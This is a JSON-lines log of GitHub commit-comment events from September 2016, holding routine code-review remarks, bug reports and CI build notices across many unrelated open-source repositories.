{"id":"4522286281","type":"CommitCommentEvent","actor":{"login":"brenns10"},"repo":{"name":"hacsoc/blognotifier"},"payload":{"comment":{"id":18913813,"position":null,"line":null,"path":null,"commit_id":"683448740d6ffde2bd7f20da40d64ccf83675141","created_at":"2016-09-06T16:08:32Z","updated_at":"2016-09-06T16:08:32Z","body":"Haha no big deal!  I'll go ahead and remove that line then."}},"created_at":"2016-09-06T16:08:32Z"}
{"id":"4522286564","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18913815,"position":null,"line":null,"path":null,"commit_id":"8b6e3a1fcdaf05b8a47899497f4099c24c997f7c","created_at":"2016-09-06T16:08:35Z","updated_at":"2016-09-06T16:08:35Z","body":"@pelikhan I'm not sure about the shims.d.ts and enums.d.ts in the default project. They are only needed if the project contains C++, and as I see from existing examples most don't. People have to add the C++ file references manually anyway, so maybe they can also add shims.d.ts?"}},"created_at":"2016-09-06T16:08:35Z"}
{"id":"4522287641","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":18913816,"position":5,"line":98,"path":"src/avkit.cs","commit_id":"0fb03df1b9a869dba0dddf3f376e7f6ce57167c9","created_at":"2016-09-06T16:08:47Z","updated_at":"2016-09-06T16:08:47Z","body":"👍 "}},"created_at":"2016-09-06T16:08:47Z"}
{"id":"4522292694","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18913825,"position":null,"line":null,"path":null,"commit_id":"bd739abab4eeda619a6309a26fecc46b049cb0ef","created_at":"2016-09-06T16:09:38Z","updated_at":"2016-09-06T16:09:38Z","body":"Also didn't know wether the thread was required for the API or not (not being able to use in the main thread).\r\n\r\nBTW: Do you know if I can omit the manual png files from the installing vpk? And can be copied later without issues? I noticed that at least icon0.png was needed to be installed or was not displayed at all (and probably other images from the game launcher). But didn't tested manual."}},"created_at":"2016-09-06T16:09:38Z"}
{"id":"4522296651","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/jsonplaceholder-client"},"payload":{"comment":{"id":18913838,"position":null,"line":null,"path":null,"commit_id":"a9bbf75daf71c7ce5a64a6cd77f37f79ec55bc05","created_at":"2016-09-06T16:10:21Z","updated_at":"2016-09-06T16:10:21Z","body":"CDN has been referenced from [here](https://cdnjs.com/libraries/normalize)"}},"created_at":"2016-09-06T16:10:21Z"}
{"id":"4522297093","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913839,"position":17,"line":832,"path":"init.el","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:10:24Z","updated_at":"2016-09-06T16:10:24Z","body":"yeah, didn't mean to check this in. Will remove."}},"created_at":"2016-09-06T16:10:24Z"}
{"id":"4522301770","type":"CommitCommentEvent","actor":{"login":"glimatecnologia"},"repo":{"name":"glimaprogramacao/aulas_de_html"},"payload":{"comment":{"id":18913850,"position":null,"line":null,"path":null,"commit_id":"c186e7742d129da0e705bd0f7370da0f45f35e23","created_at":"2016-09-06T16:11:13Z","updated_at":"2016-09-06T16:11:13Z","body":"Esta é uma estrutura básica para criar página em HTML"}},"created_at":"2016-09-06T16:11:13Z"}
{"id":"4522302063","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18913851,"position":null,"line":null,"path":null,"commit_id":"bd739abab4eeda619a6309a26fecc46b049cb0ef","created_at":"2016-09-06T16:11:17Z","updated_at":"2016-09-06T16:11:17Z","body":"If I remember correctly, all files at sce_sys must be installed, otherwise they won't show up properly."}},"created_at":"2016-09-06T16:11:17Z"}
{"id":"4522302190","type":"CommitCommentEvent","actor":{"login":"xialeizhou"},"repo":{"name":"gcc-mirror/gcc"},"payload":{"comment":{"id":18913852,"position":1209,"line":1209,"path":"gcc/edit-context.c","commit_id":"fe066ce3d8b45a687ddb9ebba6426a3746f3a8ca","created_at":"2016-09-06T16:11:18Z","updated_at":"2016-09-06T16:11:18Z","body":"cool!"}},"created_at":"2016-09-06T16:11:18Z"}
{"id":"4522303559","type":"CommitCommentEvent","actor":{"login":"streamer45"},"repo":{"name":"FacileAudio/facile"},"payload":{"comment":{"id":18913855,"position":null,"line":null,"path":null,"commit_id":"6245594726c8c16b3f3e329b53e03266120d874e","created_at":"2016-09-06T16:11:31Z","updated_at":"2016-09-06T16:11:31Z","body":"I am glad you liked it!\nLet me know how it goes. You can reach out to me If you need help with\nanything.\n\nOn Tue, Sep 6, 2016 at 5:32 PM, Joshua Lee Tucker <notifications@github.com>\nwrote:\n\n> Just wanted to say, great job on this!\n>\n> I think I'm going to have a play around on the weekend and see what I can\n> use this for :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/FacileAudio/facile/commit/6245594726c8c16b3f3e329b53e03266120d874e#commitcomment-18913295>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABv38mJolFFrn0XsdxNvxHfapIn3oDYeks5qnYd7gaJpZM4J1-Md>\n> .\n>\n"}},"created_at":"2016-09-06T16:11:31Z"}
{"id":"4522312792","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913875,"position":4,"line":4,"path":"scripts/install-jdk8-linux.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:13:12Z","updated_at":"2016-09-06T16:13:12Z","body":"are you proposing just replace lines 3 and 4? or getting rid of this file altogether?"}},"created_at":"2016-09-06T16:13:12Z"}
{"id":"4522313085","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":18913877,"position":null,"line":null,"path":null,"commit_id":"f2d869476cf25df14a6cdf14b76d8398d62c366f","created_at":"2016-09-06T16:13:14Z","updated_at":"2016-09-06T16:13:14Z","body":"This commit delivery this docs page:\r\n![ipad](https://cloud.githubusercontent.com/assets/32010/18281547/8cd9992a-7433-11e6-8539-0b84b354711c.png)\r\n![notebook](https://cloud.githubusercontent.com/assets/32010/18281546/8cd905be-7433-11e6-9b08-2b5030cfe5c3.png)\r\n![desktop](https://cloud.githubusercontent.com/assets/32010/18281544/8cd7ec1a-7433-11e6-953f-1928c3cb5dcf.png)\r\n"}},"created_at":"2016-09-06T16:13:14Z"}
{"id":"4522313190","type":"CommitCommentEvent","actor":{"login":"danny50610"},"repo":{"name":"HackerSir/PinballQA"},"payload":{"comment":{"id":18913878,"position":null,"line":null,"path":null,"commit_id":"7ba6f7ec9ce690b7eac1f3261133df86f7422e4d","created_at":"2016-09-06T16:13:15Z","updated_at":"2016-09-06T16:13:15Z","body":"我要聲明：「題目不是我出的」"}},"created_at":"2016-09-06T16:13:15Z"}
{"id":"4522318339","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"theuni/bitcoin"},"payload":{"comment":{"id":18913885,"position":6,"line":130,"path":"qa/rpc-tests/test_framework/util.py","commit_id":"fa88a425c0c1089ab75ea9223699286f40c8eea7","created_at":"2016-09-06T16:14:07Z","updated_at":"2016-09-06T16:14:07Z","body":"Good point about node0. I think it'd be tough to make sync_wallet non-racy, though, without tying it to a specific block height/hash, which is essentially what this change does.\r\n\r\nI'm pushing up an alternative which compares all block heights instead of revolving around node0's. Since the new rpc functions are essentially free (they don't lock cs_main and only block when necessary), I think that's ok."}},"created_at":"2016-09-06T16:14:07Z"}
{"id":"4522319113","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913886,"position":5,"line":153,"path":"scripts/setup.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:14:15Z","updated_at":"2016-09-06T16:14:15Z","body":"yep :("}},"created_at":"2016-09-06T16:14:15Z"}
{"id":"4522319947","type":"CommitCommentEvent","actor":{"login":"bska"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18913887,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-06T16:14:23Z","updated_at":"2016-09-06T16:14:23Z","body":"I've not rebuilt the application for a few days, but as of this commit I get the assertion failure\r\n```\r\n(farPlane > nearPlane), file [...]/ResInsight/Fwk/VizFwk/LibRender/cvfCamera.cpp, line 207\r\n```\r\nand the application crashes upon loading a model on Linux (Release build, Ubuntu 16.04.1, GCC 5.4.0 and Linux Mint 17, GCC 4.9.4).  I have not bisected the graph to pinpoint the exact commit that introduced the problem, but ca6e650 is a **plausible** candidate (the `farPlaneDist` adjustment no longer accounting for `m_minNearPlaneDistance` adjustment).\r\n\r\nApplying the hack below restores my ability to load models, but I'm sure this is not the correct solution.\r\n```diff\r\ndiff --git a/Fwk/AppFwk/cafViewer/cafViewer.cpp b/Fwk/AppFwk/cafViewer/cafViewer.cpp\r\nindex 6971ef9..cdb9b2a 100644\r\n--- a/Fwk/AppFwk/cafViewer/cafViewer.cpp\r\n+++ b/Fwk/AppFwk/cafViewer/cafViewer.cpp\r\n@@ -408,18 +408,20 @@ void caf::Viewer::optimizeClippingPlanes()\r\n #endif\r\n \r\n \r\n-    if (farPlaneDist <= nearPlaneDist) farPlaneDist = nearPlaneDist + 1.0;\r\n-\r\n     if (m_mainCamera->projection() == cvf::Camera::PERSPECTIVE)\r\n     {\r\n         // TODO: Investigate why this is needed on Linux\r\n         // When loading grid files on Linux, the nearPlaneDist results in 0 at this point\r\n         nearPlaneDist = CVF_MAX(m_minNearPlaneDistance, nearPlaneDist);\r\n \r\n+        if (farPlaneDist <= nearPlaneDist) farPlaneDist = nearPlaneDist + 1.0;\r\n+\r\n         m_mainCamera->setProjectionAsPerspective(m_cameraFieldOfViewYDeg, nearPlaneDist, farPlaneDist);\r\n     }\r\n     else\r\n     {\r\n+        if (farPlaneDist <= nearPlaneDist) farPlaneDist = nearPlaneDist + 1.0;\r\n+\r\n         m_mainCamera->setProjectionAsOrtho(m_mainCamera->frontPlaneFrustumHeight(), nearPlaneDist, farPlaneDist);\r\n     }\r\n }\r\n```"}},"created_at":"2016-09-06T16:14:23Z"}
{"id":"4522323354","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913896,"position":31,"line":204,"path":"scripts/setup.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:15:00Z","updated_at":"2016-09-06T16:15:00Z","body":"agreed"}},"created_at":"2016-09-06T16:15:00Z"}
{"id":"4522324286","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"theuni/bitcoin"},"payload":{"comment":{"id":18913897,"position":6,"line":130,"path":"qa/rpc-tests/test_framework/util.py","commit_id":"fa88a425c0c1089ab75ea9223699286f40c8eea7","created_at":"2016-09-06T16:15:09Z","updated_at":"2016-09-06T16:15:09Z","body":"See 394993de515d14c3fe6c903dc06bd80a0104eb7c"}},"created_at":"2016-09-06T16:15:09Z"}
{"id":"4522326439","type":"CommitCommentEvent","actor":{"login":"goinnn"},"repo":{"name":"jleclanche/django-push-notifications"},"payload":{"comment":{"id":18913899,"position":59,"line":132,"path":"push_notifications/apns.py","commit_id":"565a638b89aa3429fbe5a515dba8e5f798898e00","created_at":"2016-09-06T16:15:29Z","updated_at":"2016-09-06T16:15:29Z","body":"SyntaxError. You can check: from push_notifications.apns import _apns_send, APNSDataOverflow or here: https://travis-ci.org/jleclanche/django-push-notifications/builds/157869660"}},"created_at":"2016-09-06T16:15:29Z"}
{"id":"4522327388","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18913903,"position":44,"line":44,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:15:38Z","updated_at":"2016-09-06T16:15:38Z","body":"@hrousley you use `$(window)` above after already having the variables `win` above. Caching selectors minimizes touching the DOM, which speeds things up - https://ttmm.io/tech/selector-caching-jquery/"}},"created_at":"2016-09-06T16:15:38Z"}
{"id":"4522328166","type":"CommitCommentEvent","actor":{"login":"tcratius"},"repo":{"name":"pooleja/SpeedE16"},"payload":{"comment":{"id":18913906,"position":null,"line":null,"path":null,"commit_id":"4d8dd1989dcdde8fc2bb413d316eb3cf88346780","created_at":"2016-09-06T16:15:46Z","updated_at":"2016-09-06T16:15:46Z","body":"Ok done. Just need to update the crontab. Out of curiosity what does it do\nlol\n\nOn 6 Sep 2016 23:34, \"James\" <notifications@github.com> wrote:\n\n> Did you take a look at the main Readme.md?\n>\n> Once you have the server running:\n>\n> $ python3 speedE16-server.py\n>\n> You can run the client.py against it like so:\n>\n> $ python3 client.py\n> Running upload/download test against: 0.0.0.0\n> Created temp file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\n> Generated a hash of the temp file: 18d909ccf9151f8aa52b41f0b9312b93391c57c0f895d4f0dab573af5cd51cf2\n> Uploaded the file.  Elapsed time: 0.6494739055633545\n> Upload shows success\n> Downloading: http://0.0.0.0:8016/download?file=1U85DVKFJLY6M6J7HIGN to: /home/ubuntu/SpeedE16/client-data/1U85DVKFJLY6M6J7HIGN\n> Downloaded the file.  Elapsed Time: 0.5735130310058594\n> Download shows success\n> Deleted the temp downloaded file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\n> Upload Speed: 12.31766192832765 Mbps\n> Download Speed: 13.94911635393733 Mbps\n>\n> This shows that the client has connected to your local speed server and\n> tested upload/download speeds.\n>\n> Does that make sense?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pooleja/SpeedE16/commit/4d8dd1989dcdde8fc2bb413d316eb3cf88346780#commitcomment-18910992>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AU91PnbwkBs6zgcqwpGbzmlipVLMXB5pks5qnWv_gaJpZM4J1oWZ>\n> .\n>\n"}},"created_at":"2016-09-06T16:15:46Z"}
{"id":"4522335375","type":"CommitCommentEvent","actor":{"login":"enorthrup"},"repo":{"name":"CIDI/kennethware-2.0"},"payload":{"comment":{"id":18913922,"position":null,"line":null,"path":null,"commit_id":"4c5189a34d7bbb4345e74ec5207655e59f5513bc","created_at":"2016-09-06T16:16:56Z","updated_at":"2016-09-06T16:16:56Z","body":"Hi Kenneth,\r\n\r\nI know that the open source design tools are no longer under active development according to the Cidi Labs site (https://cidilabs.freshdesk.com/support/solutions/articles/14000017042-what-is-the-difference-between-earlier-versions-of-design-tools-and-version-3-hosted-by-cidi-labs-), but you still have been keeping them functioning.  What are your plans for this in the future?  Do you have a date where you will no longer support the open source version?\r\n\r\nThanks,\r\nElena"}},"created_at":"2016-09-06T16:16:56Z"}
{"id":"4522336451","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913927,"position":4,"line":4,"path":"scripts/install-jdk8-linux.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:17:09Z","updated_at":"2016-09-06T16:17:09Z","body":"I'm not entirely familiar with how this stuff works on Linux, but—\r\n- I feel like `add-apt-repository` and `apt-get update` should be in the \"set up apt-get\" section of `setup.sh`\r\n- I think line 4 should be able to use `ensure-installed.sh`\r\n- Why do we need to `apt-get update`—does it not pull info from the web automatically?\r\n- Does installing `oracle-java8-installer` automatically install Java? Or is another step required?"}},"created_at":"2016-09-06T16:17:09Z"}
{"id":"4522338955","type":"CommitCommentEvent","actor":{"login":"hnshhslsh"},"repo":{"name":"hnshhslsh/virtual-judge"},"payload":{"comment":{"id":18913933,"position":null,"line":null,"path":null,"commit_id":"869d64ae1cbb028cc9ef0039ee05465ab04d8c8e","created_at":"2016-09-06T16:17:34Z","updated_at":"2016-09-06T16:17:34Z","body":"重新抓取题目的时候，已存在的PDF不会重新下载"}},"created_at":"2016-09-06T16:17:34Z"}
{"id":"4522340882","type":"CommitCommentEvent","actor":{"login":"nsheff"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18913934,"position":null,"line":null,"path":null,"commit_id":"9184023bc494cec070aa481a32c175dc82946b01","created_at":"2016-09-06T16:17:55Z","updated_at":"2016-09-06T16:17:55Z","body":"@nfortelny  had already fixed this in `dev`, by the way..."}},"created_at":"2016-09-06T16:17:55Z"}
{"id":"4522341150","type":"CommitCommentEvent","actor":{"login":"nickwallen"},"repo":{"name":"apache/incubator-metron"},"payload":{"comment":{"id":18913936,"position":25,"line":25,"path":"metron-platform/metron-common/src/main/java/org/apache/metron/common/dsl/StellarFunction.java","commit_id":"1ea8d9ee426c6e0b14238abd6cfb5f8763fd9fa5","created_at":"2016-09-06T16:17:59Z","updated_at":"2016-09-06T16:17:59Z","body":"As part of this PR, the `StellarFunction` interface was added.   A `Context` is passed to both the `apply` and the `initialize` method.  Why do both methods receive a Context? Are they the same Context?  When should I initialize my function with one over the other?  Docs/comments on this key interface would be very helpful."}},"created_at":"2016-09-06T16:17:59Z"}
{"id":"4522341377","type":"CommitCommentEvent","actor":{"login":"JobsLong"},"repo":{"name":"lostrack/phphub5"},"payload":{"comment":{"id":18913937,"position":null,"line":null,"path":null,"commit_id":"2533f2831b2d9c143bdc6fcf0bb6345a7fc2b632","created_at":"2016-09-06T16:18:01Z","updated_at":"2016-09-06T16:18:01Z","body":"Got it"}},"created_at":"2016-09-06T16:18:01Z"}
{"id":"4522341609","type":"CommitCommentEvent","actor":{"login":"estebanms"},"repo":{"name":"ejedigitalcr/people-lookup-cr"},"payload":{"comment":{"id":18913938,"position":null,"line":null,"path":null,"commit_id":"afac4e3cfdffdebd731f9fe4fc4ca417ac0f050f","created_at":"2016-09-06T16:18:04Z","updated_at":"2016-09-06T16:18:04Z","body":"@jorge-pikachu sería más fácil usar `CSV.foreach` (http://ruby-doc.org/stdlib-1.9.3/libdoc/csv/rdoc/CSV.html#method-c-foreach) ya que los archivos son CSV.\r\n\r\nAdemás, no es necesario declarar una clase que se llame `Person`, porque ya está el modelo y se puede usar directamente."}},"created_at":"2016-09-06T16:18:04Z"}
{"id":"4522341768","type":"CommitCommentEvent","actor":{"login":"SahanaKamath19"},"repo":{"name":"SahanaKamath19/WDI_Prep_Course"},"payload":{"comment":{"id":18913941,"position":null,"line":null,"path":null,"commit_id":"17a1ccd47c692653de78d6e13107f925ca59d48b","created_at":"2016-09-06T16:18:06Z","updated_at":"2016-09-06T16:18:06Z","body":"first code push"}},"created_at":"2016-09-06T16:18:06Z"}
{"id":"4522343624","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18913947,"position":44,"line":44,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:18:22Z","updated_at":"2016-09-06T16:18:22Z","body":"@hrousley technically, you've already have a `loaded` event since all this is wrapped in the jQuery `ready` callback. You can remove `DOMContentLoaded ` and `load` and break the function out of the callback and call it directly. You'd then want to update your binding to call the function. That would be something like `$(window).on('resize scroll', myFunction);`"}},"created_at":"2016-09-06T16:18:22Z"}
{"id":"4522345942","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913953,"position":5,"line":209,"path":".zshrc","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T16:18:47Z","updated_at":"2016-09-06T16:18:47Z","body":"sounds good, I'll fix this up."}},"created_at":"2016-09-06T16:18:47Z"}
{"id":"4522346766","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913954,"position":null,"line":null,"path":null,"commit_id":"111fda15ae8e41b7a757eafabd1ce8c6b84c0efe","created_at":"2016-09-06T16:18:56Z","updated_at":"2016-09-06T16:18:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 933](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12764&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T16:18:56Z"}
{"id":"4522347224","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913955,"position":null,"line":null,"path":null,"commit_id":"ea932cdc62bc8b989dacba5ae4ebabd9bbd54fd2","created_at":"2016-09-06T16:19:01Z","updated_at":"2016-09-06T16:19:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 934](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12762&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T16:19:01Z"}
{"id":"4522347232","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913956,"position":null,"line":null,"path":null,"commit_id":"ea932cdc62bc8b989dacba5ae4ebabd9bbd54fd2","created_at":"2016-09-06T16:19:01Z","updated_at":"2016-09-06T16:19:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 935](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12765&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T16:19:01Z"}
{"id":"4522353462","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18913976,"position":44,"line":44,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:20:07Z","updated_at":"2016-09-06T16:20:07Z","body":"@hrousley good call on the `resize` event. You'll probably want to debounce these. This is a similar situation to what we did in the BaM site - https://github.com/baminteractive/project-bam/pull/288#discussion_r74610950. Scroll and resize get called multiple times for each scroll or resize movment, so it's better to control how often your function fires via debouncing."}},"created_at":"2016-09-06T16:20:07Z"}
{"id":"4522355473","type":"CommitCommentEvent","actor":{"login":"jyhsu2000"},"repo":{"name":"HackerSir/PinballQA"},"payload":{"comment":{"id":18913982,"position":null,"line":null,"path":null,"commit_id":"7ba6f7ec9ce690b7eac1f3261133df86f7422e4d","created_at":"2016-09-06T16:20:28Z","updated_at":"2016-09-06T16:20:28Z","body":"C8763～（對著樓上大喊\r\n感覺這些眼熟的題目...\r\n應該是 @toto850105 出的..."}},"created_at":"2016-09-06T16:20:28Z"}
{"id":"4522357298","type":"CommitCommentEvent","actor":{"login":"HtHNightwolf"},"repo":{"name":"LattePandaTeam/LattePanda-Win10-Software"},"payload":{"comment":{"id":18913988,"position":null,"line":null,"path":null,"commit_id":"91073a4d8680d52dbeedacaca7b936ff9a91fba8","created_at":"2016-09-06T16:20:47Z","updated_at":"2016-09-06T16:20:47Z","body":"How can I download the Driver package? Or only the Display driver pack?\r\nThere is no ZIP button, there is no download or RAW or share or whatsoever button.\r\n\r\nThe official Driver Link that I found is from before the last changes made here."}},"created_at":"2016-09-06T16:20:47Z"}
{"id":"4522360539","type":"CommitCommentEvent","actor":{"login":"oldcola"},"repo":{"name":"oldcola/PhaSee"},"payload":{"comment":{"id":18913995,"position":null,"line":null,"path":null,"commit_id":"4a563eaa983b17519e36e260b9ec314b2b4defbd","created_at":"2016-09-06T16:21:19Z","updated_at":"2016-09-06T16:21:19Z","body":"PhaSee project is the continuation of PepTeam.\r\nBuilded while learning coding."}},"created_at":"2016-09-06T16:21:19Z"}
{"id":"4522365087","type":"CommitCommentEvent","actor":{"login":"ylavoie"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18914005,"position":null,"line":null,"path":null,"commit_id":"13448345480bdbbc02967433d44c001846afb26c","created_at":"2016-09-06T16:22:08Z","updated_at":"2016-09-06T16:22:08Z","body":"It does. I have yet to confirm that feature files works in parallel. This is where the most gains would be for most of the time is spent waiting for browsers.\r\nParallelize at file level should work like non-feature tests. Doing it at scenario level would be ultimate but the user only have to split his files accordingly now to do the same.\r\nThis raise an issue about testrules.yml, for it is written in terms of tests and it is not obvious for the user to map features to tests names for proper dependencies."}},"created_at":"2016-09-06T16:22:08Z"}
{"id":"4522365331","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914007,"position":59,"line":59,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:22:11Z","updated_at":"2016-09-06T16:22:11Z","body":"@hrousley You might have already been planning on this, but go ahead and push this data through to the final function. I know you don't have anything to `POST` against, but you can at least format the data correctly so it'd be ready to send."}},"created_at":"2016-09-06T16:22:11Z"}
{"id":"4522371496","type":"CommitCommentEvent","actor":{"login":"endel"},"repo":{"name":"GoodgameStudios/RobotlegsJS"},"payload":{"comment":{"id":18914022,"position":13,"line":45,"path":"package.json","commit_id":"4ccbdc8dea618dfd598eed4c900170070b02d2c6","created_at":"2016-09-06T16:23:17Z","updated_at":"2016-09-06T16:23:17Z","body":"Is `karma-jasmine` really necessary here?"}},"created_at":"2016-09-06T16:23:17Z"}
{"id":"4522371715","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-inspirations"},"payload":{"comment":{"id":18914024,"position":25,"line":109,"path":"includes/class-boldgrid-inspirations-dependency-plugins.php","commit_id":"9350be0b1ccc31defe294fe3bb7e3a2782bc2d17","created_at":"2016-09-06T16:23:19Z","updated_at":"2016-09-06T16:23:19Z","body":"It is better to pass a JSON set, so that unexpected output does not corrupt the string checking.  For example, send an int an array '[1]' and check using: 1 === JSON.parse( response )[0]\r\nor send a key/value pair with a key name and a bool value '{\"success\":true}' and check using: true === JSON.parse( response ).success\r\nor: ! JSON.parse( response ).success"}},"created_at":"2016-09-06T16:23:19Z"}
{"id":"4522375313","type":"CommitCommentEvent","actor":{"login":"mgonzales71"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18914035,"position":null,"line":null,"path":null,"commit_id":"ed00cd660dbbd40cb678b5b3ddfce569bf31bb85","created_at":"2016-09-06T16:23:57Z","updated_at":"2016-09-06T16:23:57Z","body":"well - that's what I get for quickly scanning log files - that header was from a curl session not related to streaming so my bad."}},"created_at":"2016-09-06T16:23:57Z"}
{"id":"4522376257","type":"CommitCommentEvent","actor":{"login":"Werbellin"},"repo":{"name":"CJLST/ZZAnalysis"},"payload":{"comment":{"id":18914038,"position":null,"line":null,"path":null,"commit_id":"30f86c42f96e420c50f827019e6884111e953cf6","created_at":"2016-09-06T16:24:10Z","updated_at":"2016-09-06T16:24:10Z","body":"Hello Nicola,\r\nwe have been using the corrections for the full ICHEP dataset, but our recipe did not work when I tried in September. It looks like the tags/branches in the ECAL repo were changed. I just realised that all they did was move from branches to tags (I guess). I'll look into it and see that we use the tagged version.\r\n"}},"created_at":"2016-09-06T16:24:10Z"}
{"id":"4522377451","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914039,"position":59,"line":59,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:24:22Z","updated_at":"2016-09-06T16:24:22Z","body":"@hrousley in this section, you'll need to think about how/where you want to retain the state of the ads over their life on the page. Ads can scroll in and out of view multiple times in one visit, but you only want to record the start once. This means you should maintain a list of the ads somewhere or attaching the data to the DOM element using something like jQuery's data method. I'd personally go with the former, but either can work - https://api.jquery.com/data/."}},"created_at":"2016-09-06T16:24:22Z"}
{"id":"4522382221","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914049,"position":48,"line":48,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:25:12Z","updated_at":"2016-09-06T16:25:12Z","body":"@hrousley since you've already got jQuery loaded, I'd stick to using those patterns for accessing elements. If you want to go plain JS that's fine too, but sticking to the pattern will help make the code easier to follow."}},"created_at":"2016-09-06T16:25:12Z"}
{"id":"4522383218","type":"CommitCommentEvent","actor":{"login":"mariobodemann"},"repo":{"name":"contentful/contentful-export"},"payload":{"comment":{"id":18914051,"position":null,"line":null,"path":null,"commit_id":"71916a44c92a9ad5143e680bd9050aa86092621b","created_at":"2016-09-06T16:25:21Z","updated_at":"2016-09-06T16:25:21Z","body":"Just wondering: You are changing a major version of a transient dependency. Does anyone rely on them? If so I would also think about upgrading the major version of the SDK ..."}},"created_at":"2016-09-06T16:25:21Z"}
{"id":"4522385497","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-inspirations"},"payload":{"comment":{"id":18914055,"position":4,"line":134,"path":"pages/boldgrid-inspirations.php","commit_id":"9350be0b1ccc31defe294fe3bb7e3a2782bc2d17","created_at":"2016-09-06T16:25:45Z","updated_at":"2016-09-06T16:25:45Z","body":"Style preference.\r\nUse double-quotes (\") for HTML and single-quotes (') in PHP."}},"created_at":"2016-09-06T16:25:45Z"}
